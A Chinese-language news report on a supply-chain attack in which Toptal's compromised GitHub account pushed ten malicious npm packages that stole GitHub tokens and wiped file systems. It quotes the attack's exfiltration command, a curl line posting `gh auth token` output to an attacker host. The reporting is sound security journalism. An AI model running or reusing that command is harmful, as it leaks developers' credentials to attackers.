开源生态遭攻击-npm被植入恶意代码
网络安全公司Socket最新报告显示,全球知名人才机构Toptal的npm官方页面遭黑客入侵,其发布的10个JavaScript软件包被植入恶意代码,累计下载量达5000次。目前受影响软件包已从npm下架,但5000名开发者仍需紧急排查系统安全状况。
攻击手法:双重渗透的精准打击
- 入侵源头锁定GitHub
攻击者首先攻破Toptal的GitHub组织账户,利用该权限向npm推送恶意包。安全专家指出,黑客可能通过两种路径实现:- 利用GitHub Actions自动化流程
- 窃取存储的npm发布令牌
- 恶意载荷双重杀伤链
被植入的恶意代码分两阶段执行:- 信息窃取阶段
通过命令行curl -d "$(gh auth token)" [恶意域名]
窃取用户GitHub身份令牌,将凭证传输至黑客控制的webhook.si te域名端点 - 系统摧毁阶段
获取凭证后自动触发系统删除脚本,针对Windows/Unix系统分别执行文件系统清除指令
- 信息窃取阶段
安全困局:开源信任体系遭冲击
- 响应滞后暴露漏洞
Toptal至今未公布账户遭入侵的具体原因,官方对安全质询保持沉默。安全团队坦言:”缺乏完整数字取证证据,难以精确还原攻击链条”。 - 开源审查机制失效
Socket报告指出核心矛盾:“要求用户在使用前审查所有程序”在现实中根本不可行。普通用户缺乏编译知识,专业开发者又无足够时间逐行检查项目代码及依赖库。
- 信任根基面临崩塌
业内专家发出预警:随着攻击者通过贿赂、胁迫等手段控制主流库的风险上升,开源生态或将迎来三大变革:- 强制AI安全扫描成为发布前置条件
- 实施更严格的账户身份验证机制
- 个人开发者参与门槛显著提高
消息来源:https://arstechnica.com/security/2025/07/open-source-repositories-are-seeing-a-rash-of-supply-chain-attacks/
发表回复